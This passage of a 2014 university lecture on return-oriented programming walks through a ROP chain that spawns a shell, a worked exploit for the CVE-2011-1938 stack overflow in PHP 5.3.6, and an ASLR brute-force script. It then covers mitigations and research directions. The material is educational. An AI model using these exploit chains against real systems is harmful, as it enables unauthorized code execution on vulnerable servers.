  • 29. Step 5 - Build the ROP chain p += pack('<I', 0x08052bba) # pop edx ; ret p += pack('<I', 0x080cd9a0) # @ .data p += pack('<I', 0x080a4be6) # pop eax ; ret p += '/bin' p += pack('<I', 0x080798dd) # mov dword ptr [edx], eax ; ret p += pack('<I', 0x08052bba) # pop edx ; ret p += pack('<I', 0x080cd9a4) # @ .data + 4 p += pack('<I', 0x080a4be6) # pop eax ; ret p += '//sh' p += pack('<I', 0x080798dd) # mov dword ptr [edx], eax ; ret p += pack('<I', 0x08052bba) # pop edx ; ret p += pack('<I', 0x080cd9a8) # @ .data + 8 p += pack('<I', 0x0804aae0) # xor eax, eax ; ret p += pack('<I', 0x080798dd) # mov dword ptr [edx], eax ; ret p += pack('<I', 0x08048144) # pop ebx ; ret p += pack('<I', 0x080cd9a0) # @ .data p += pack('<I', 0x080c5dd2) # pop ecx ; ret p += pack('<I', 0x080cd9a8) # @ .data + 8 p += pack('<I', 0x08052bba) # pop edx ; ret p += pack('<I', 0x080cd9a8) # @ .data + 8 p += pack('<I', 0x0804aae0) # xor eax, eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca8) # int 0x80 2014 - J.Salwan Course lecture on the ROP attack 29
  • 30. ROPgadget tool – ROP chain generation Demo time 2014 - J.Salwan Course lecture on the ROP attack 30
  • 31. Real example with the CVE-2011-1938 <?php $addr = str_repeat("A", 500); $fd = socket_create(AF_UNIX, SOCK_STREAM, 1); $ret = socket_connect($fd, $addr); ?> ● Stack overflow in PHP 5.3.6 via the “addr” parameter – AF_UNIX must be setup to trigger the bug 2014 - J.Salwan Course lecture on the ROP attack 31
  • 32. CVE-2011-1938 Analysis PHP_FUNCTION(socket_connect) { zval *arg1; php_socket *php_sock; struct sockaddr_in sin; #if HAVE_IPV6 struct sockaddr_in6 sin6; #endif struct sockaddr_un s_un; /* stack var */ char *addr; int retval, addr_len; long port = 0; int argc = ZEND_NUM_ARGS(); [...] case AF_UNIX: memset(&s_un, 0, sizeof(struct sockaddr_un)); s_un.sun_family = AF_UNIX; memcpy(&s_un.sun_path, addr, addr_len); /* Unlimited copy. Stack overflow */ retval = connect(php_sock->bsd_socket, (struct sockaddr *) &s_un, (socklen_t) XtOffsetOf(struct sockaddr_un, sun_path) + addr_len); break; [...] } 2014 - J.Salwan Course lecture on the ROP attack 32
  • 33. CVE-2011-1938 exploitation ● Objective – execve("/bin/sh", args, env); ● Necessary memory/registers state – EAX ← 11 (sys_execve) – EBX ← "/bin/sh" (char *) – ECX ← arguments (char **) – EDX ← env (char **) 2014 - J.Salwan Course lecture on the ROP attack 33
  • 34. CVE-2011-1938 Possible gadgets [G01] int $0x80 [G02] inc %eax; ret [G03] xor %eax,%eax; ret [G04] mov %eax,(%edx); ret [G05] pop %ebp; ret [G06] mov %ebp,%eax; pop %ebx; pop %esi; pop %edi; pop %ebp; ret [G07] pop %edi; pop %ebp; ret [G08] mov %edi,%edx; pop %esi; pop %edi; pop %ebp; ret [G09] pop %ebx; pop %esi; pop %edi; pop %ebp; ret [G10] xor %ecx,%ecx; pop %ebx; mov %ecx,%eax; pop %esi; pop %edi; pop %ebp; ret /! Be careful that your gadgets will not erase values already loaded. Example with the gadgets G10 and the EAX register. 2014 - J.Salwan Course lecture on the ROP attack 34
  • 35. CVE-2011-1938 Possible gadgets ● [G01] int 0x80 – Raise an exception ● [G02] inc %eax ; ret – Setup EAX ← 11 (sys_excve) ● [G03] xor eax, eax ; ret – Setup EAX ← 0 ● [G04] mov %eax, (edx) ; ret – Write-what-where ● [G05 & G06] pop %ebp ; ret && mov %ebp, %eax ; ret – Used to control the EAX register in the gadget 04 [G04] ● [G07 & G08] pop %edi, 
 ; ret && mov %edi, %edx ; 
 ; ret – Used to the RDX register in the gadget 4 [G04] ● [G09] – Setup EBX ← First argument of the execve ● [G10] – Setup ECX ← Second argument of execve 2014 - J.Salwan Course lecture on the ROP attack 35
  • 36. CVE-2011-1938 The payload – Define gadgets ● Define useful gadgets found in /usr/bin/php binary define('DUMMY', "x42x42x42x42");// padding define('DATA', "x20xbax74x08");// .data 0x46a0 0x874ba20 define('DATA4', "x24xbax74x08");// DATA + 4 define('DATA8', "x28xbax74x08");// DATA + 8 define('DATA12', "x3cxbax74x08");// DATA + 12 define('INT_80', "x27xb6x07x08");// 0x0807b627: int $0x80 define('INC_EAX', "x66x50x0fx08");// 0x080f5066: inc %eax | ret define('XOR_EAX', "x60xb4x09x08");// 0x0809b460: xor %eax,%eax | ret define('MOV_A_D', "x84x3ex12x08");// 0x08123e84: mov %eax,(%edx) | ret define('POP_EBP', "xc7x48x06x08");// 0x080648c7: pop %ebp | ret define('MOV_B_A', "x18x45x06x08");// 0x08064518: mov %ebp,%eax | pop %ebx | pop %esi // pop %edi | pop %ebp | ret define('MOV_DI_DX', "x20x26x07x08");// 0x08072620: mov %edi,%edx | pop %esi | pop %edi // pop %ebp | ret define('POP_EDI', "x23x26x07x08");// 0x08072623: pop %edi | pop %ebp | ret define('POP_EBX', "x0fx4dx21x08");// 0x08214d0f: pop %ebx | pop %esi | pop %edi | // pop %ebp | ret define('XOR_ECX', "xe3x3bx1fx08");// 0x081f3be3: xor %ecx,%ecx|pop %ebx|mov %ecx,%eax // pop %esi|pop %edi|pop %ebp|ret 2014 - J.Salwan Course lecture on the ROP attack 36
  • 37. CVE-2011-1938 The payload – Step 1 ● Store “//bi” in the memory POP_EDI. // pop %edi DATA. // 0x874ba20 DUMMY. // pop %ebp MOV_DI_DX. // mov %edi,%edx DUMMY. // pop %esi DUMMY. // pop %edi "//bi". // pop %ebp MOV_B_A. // mov %ebp,%eax DUMMY. // pop %ebx DUMMY. // pop %esi DUMMY. // pop %edi DUMMY. // pop %ebp MOV_A_D. // mov %eax,(%edx) 2014 - J.Salwan Course lecture on the ROP attack 37
  • 38. CVE-2011-1938 The payload – Step 1 ● Store “n/sh” in the memory POP_EDI. // pop %edi DATA4. // 0x874ba24 DUMMY. // pop %ebp MOV_DI_DX. // mov %edi,%edx DUMMY. // pop %esi DUMMY. // pop %edi "n/sh". // pop %ebp MOV_B_A. // mov %ebp,%eax DUMMY. // pop %ebx DUMMY. // pop %esi DUMMY. // pop %edi DUMMY. // pop %ebp MOV_A_D. // mov %eax,(%edx) 2014 - J.Salwan Course lecture on the ROP attack 38
  • 39. CVE-2011-1938 The payload – Step 1 ● Store “0” at the end. POP_EDI. // pop %edi DATA8. // 0x874ba28 DUMMY. // pop %ebp MOV_DI_DX. // mov %edi,%edx DUMMY. // pop %esi DUMMY. // pop %edi DUMMY. // pop %ebp XOR_EAX. // xor %eax,%eax MOV_A_D. // mov %eax,(%edx) 2014 - J.Salwan Course lecture on the ROP attack 39
  • 40. CVE-2011-1938 The payload – Step 2 ● Setup arguments XOR_ECX. // xor %ecx,%ecx DUMMY. // pop %ebx DUMMY. // pop %esi DUMMY. // pop %edi DUMMY. // pop %ebp POP_EBX. // pop %ebx DATA. // 0x874ba20 DUMMY. // pop %esi DUMMY. // pop %edi DUMMY. // pop %ebp 2014 - J.Salwan Course lecture on the ROP attack 40
  • 41. CVE-2011-1938 The payload – Step 3 ● Setup syscall number XOR_EAX. // xor %eax,%eax INC_EAX. // inc %eax INC_EAX. // inc %eax INC_EAX. // inc %eax INC_EAX. // inc %eax INC_EAX. // inc %eax INC_EAX. // inc %eax INC_EAX. // inc %eax INC_EAX. // inc %eax INC_EAX. // inc %eax INC_EAX. // inc %eax INC_EAX. // inc %eax 2014 - J.Salwan Course lecture on the ROP attack 41
  • 42. CVE-2011-1938 The payload – Step 4 ● Raise an exception INT_80; // int $0x80 ● Trigger the vulnerability $evil = $padd.$payload; $fd = socket_create(AF_UNIX, SOCK_STREAM, 1); $ret = socket_connect($fd, $evil); 2014 - J.Salwan Course lecture on the ROP attack 42
  • 43. Mitigation against the ROP attack ● Linux - Position-Independent Executable – Applies the ASLR on the section .text ● Can be bypassed on old specific 32bits-based Linux distribution – PIC (Position-Independent Code) is used for library when a binary is compiled with PIE ● On Windows, ASLR can include the section .text 2014 - J.Salwan Course lecture on the ROP attack 43
  • 44. ASLR – Entropy not enough on certain old distribution ● Tested on a ArchLinux 32 bits in 2011 – NX enable – ASLR enable – PIE enable – RELRO full ● If you don't have enough gadgets : – Choose yours in the libc – Brute-force the base address 2014 - J.Salwan Course lecture on the ROP attack 44
  • 45. PIC/PIE – Entropy not enough on certain old distribution ● Brute-force the base address base_addr = 0xb770a000 p = "a" * 44 # execve /bin/sh generated by RopGadget v3.3 p += pack("<I", base_addr + 0x000e07c1) # pop %edx | pop %ecx | pop %ebx | ret p += pack("<I", 0x42424242) # padding p += pack("<I", base_addr + 0x00178020) # @ .data p += pack("<I", 0x42424242) # padding p += pack("<I", base_addr + 0x00025baf) # pop %eax | ret p += "/bin" [...] 2014 - J.Salwan Course lecture on the ROP attack 45
  • 46. PIC/PIE – Entropy not enough on certain old distribution ● Wait for a few seconds [jonathan@Archlinux rop-bf]$ while true ; do ./main "$(./exploit.py)" ; done Segmentation fault Segmentation fault Segmentation fault Segmentation fault Segmentation fault [...] Segmentation fault Segmentation fault Segmentation fault Segmentation fault Segmentation fault Segmentation fault Segmentation fault sh-4.2$ 2014 - J.Salwan Course lecture on the ROP attack 46
  • 47. ROP variants ● Jump Oriented Programming [8] ● String Oriented Programmng [9] ● Blind Return Oriented Programming [10] ● Signal Return Oriented Programming [11] 2014 - J.Salwan Course lecture on the ROP attack 47
  • 48. Jump Oriented Programming ● Use the jump instruction instead of the ret one ● “The attack relies on a gadget dispatcher to dispatch and execute the functional gadgets” ● “The “program counter” is any register that points into the dispatch table” 2014 - J.Salwan Course lecture on the ROP attack 48
  • 49. Jump Oriented Programming 2014 - J.Salwan Course lecture on the ROP attack 49
  • 50. String Oriented Programmng ● SOP uses a format string bug to get the control flow. ● SOP uses two scenario to get the control of the application – Direct control flow redirect ● Erase the return address on the stack – Jump on a gadget which adjusts the stack frame to the attacker-controlled buffer ● If the buffer is on the stack → we can use the ROP ● If the buffer is on the heap → we cabn use the JOP – Indirect control flow redirect ● Erase a GOT entry – Jump on a gadget (ROP scenario) – Jump on a gadgets dispatcher (JOP scenario) 2014 - J.Salwan Course lecture on the ROP attack 50
  • 51. Blind Return Oriented Programming ● BROP deals with the ROP and “timing attack” ● Constraints: – The vulnerability must be a stack buffer overflow – The target binary (server) must restart after the crash ● Scan the memory byte-by-byte to find potential gadgets – Try to execute the _write_ function/syscall to leak more gadget from the .text section 2014 - J.Salwan Course lecture on the ROP attack 51
  • 52. Signal Return Oriented Programming ● Uses the SIGRETURN Linux signal to load values from the stack to the registers – Store the values on the stack then raise the SIGRETURN syscall ● Your registers will be initialized with the stack values 2014 - J.Salwan Course lecture on the ROP attack 52
  • 53. Some cool research subjects ● ROP chain mitigation – Heuristic ROP detection ● ROP chain generation via theorem solver – Use a SAT/SMT solver to build a ROP chain ● Gadgets finding via instruction semantics – Looking for gadgets based on their semantics ● LOAD/STORE, GET/PUT 2014 - J.Salwan Course lecture on the ROP attack 53
  • 54. Gadgets semantics 2014 - J.Salwan Course lecture on the ROP attack 54
  • 55. Example of gadgets' semantics with the nrop tool (Aurelien's work) ● Nrop tool based on Qemu and LLVM ● Example of semantic with “mov rax, rbx ; ret” Qemu: nopn $0x2,$0x2 mov_i64 rax,rbx qemu_ld_i64 tmp0,rsp,leq,$0x0 movi_i64 tmp11,$0x8 add_i64 tmp3,rsp,tmp11 mov_i64 rsp,tmp3 st_i64 tmp0,env,$0x80 exit_tb $0x0 end LLVM: ; ModuleID = 'X' @rbx = external global i64 @rax = external global i64 @rsp = external global i64 @rip = external thread_local global i64 ; Function Attrs: nounwind define i64 @F0cktion(i64) #0 { entry: %Lgv = load i64* @rbx store i64 %Lgv, i64* @rax %Lgv1 = load i64* @rsp %Ildq = inttoptr i64 %Lgv1 to i64* %Ldq = load i64* %Ildq %Oarith = add i64 %Lgv1, 8 store i64 %Oarith, i64* @rsp store i64 %Ldq, i64* @rip ret i64 0 } 2014 - J.Salwan Course lecture on the ROP attack 55
  • 56. Example of gadgets' semantics with the nrop tool (Aurelien's work) ● Gadgets finding via instruction semantics % ./nrop -t 4889d8c3 examples/opti | grep "equivalent! 3" -A2 -- Found equivalent! 3 [X] xchg rbx, rax ; ret ; [X] mov rax, rbx ; ret ; -- Found equivalent! 3 [X] xchg rcx, rbx ; lea rax, ptr [rcx] ; ret ; [X] mov rax, rbx ; ret ; [
] % ./nrop -t 48c7c034120000c3 examples/opti | grep "equivalent! 3" -A2 Found equivalent! 3 [X] push 0x1234 ; pop rax ; inc rbx ; ret ; [X] mov rax, 0x1234 ; ret ; -- Found equivalent! 3 [X] push 0x1234 ; pop rbp ; xchg rbp, rax ; ret ; [X] mov rax, 0x1234 ; ret ; -- Found equivalent! 3 [X] push 0xffffffffffffedcc ; pop rdx ; xor rax, rax ; sub rax, rdx ; ret ; [X] mov rax, 0x1234 ; ret ; 2014 - J.Salwan Course lecture on the ROP attack 56
  • 57. Example of gadgets' semantics (Axel's work) ● Axel Souchet works on a similar approach ; here how it works – Use a virtual CPU and symbolic variables – Setup some constraints on this virtual CPU – Execute symbolically the gadgets – Then compare the result using a theorem solver (z3) 2014 - J.Salwan Course lecture on the ROP attack 57
  • 58. Example of gadgets' semantics (Axel's work) ● Example with several constraints: "I want EAX = EBX = 0 at the end of the gadget execution": PS D:Codes> python.exe look_for_gadgets_with_equations.py xor eax, eax ; push eax ; mov ebx, eax ; ret xor eax, eax ; xor ebx, ebx ; ret [...] ● Find a way to pivot code execution to the stack: "I want EIP = ESP at the end of the gadget execution": PS D:Codes> python.exe look_for_gadgets_with_equations2.py add dword ptr [ebx], 2 ; push esp ; ret jmp esp pushal ; mov eax, 0xffffffff ; pop ebx ; pop esi ; pop edi ; ret [...] 2014 - J.Salwan Course lecture on the ROP attack 58
  • 59. ROPchain generation via state machine and backtracking 2014 - J.Salwan Course lecture on the ROP attack 59
  • 60. ROP chain generation via theorem solver ● Use a SAT/SMT solver to generate a ROP chain is not so trivial. – /! We must keep an execution order – Better/harder if we generate the optimal solution – Better/harder if we would like to generate a ROP chain quickly 2014 - J.Salwan Course lecture on the ROP attack 60
  • 61. ROP chain generation using backtracking and state-machine [12] ● It's possible to generate a ROP chain using only the backtracking technique and a state machine (1) Initialize a current context ● It's basically the states register from the crash point (2) Initialize a targeted context (3) Backtrack and apply the gadgets semantics (4) Stop when the current context is equal to the targeted context 2014 - J.Salwan Course lecture on the ROP attack 61
  • 62. ROP chain generation using backtracking and state-machine - Examples of gadgets semantics This is a dumb example of semantics but enough for a PoC. If you plan to make a reliable version, you have to describe the flags and memory effects. 2014 - J.Salwan Course lecture on the ROP attack 62
  • 63. ROP chain generation using backtracking and state-machine Demo time 2014 - J.Salwan Course lecture on the ROP attack 63
  • 64. Conclusion ● The ROP is now a current operation and it's actively used by every attackers ● There is yet a lot of research around this attack like: – ROP mitigation (heuristic, etc...) – ROP chain generation – Smart gadgets finding – Etc... 2014 - J.Salwan Course lecture on the ROP attack 64
  • 65. References ● [1] http://cseweb.ucsd.edu/~hovav/talks/blackhat08.html ● [2] http://cseweb.ucsd.edu/~hovav/dist/sparc.pdf ● [3] https://github.com/0vercl0k/rp ● [4] http://ropshell.com/ropeme/ ● [5] https://github.com/pakt/ropc ● [6] https://github.com/awailly/nrop ● [7] http://shell-storm.org/project/ROPgadget/ ● [8] https://www.comp.nus.edu.sg/~liangzk/papers/asiaccs11.pdf ● [9] https://www.lst.inf.ethz.ch/research/publications/PPREW_2013/PPREW_2013.pdf ● [10] http://www.scs.stanford.edu/brop/bittau-brop.pdf ● [11] https://labs.portcullis.co.uk/blog/ohm-2013-review-of-returning-signals-for-fun-and-profit/ ● [12] http://shell-storm.org/repo/Notepad/ROP-chain-generation-via-backtracking-and-state-machine.txt 2014 - J.Salwan Course lecture on the ROP attack 65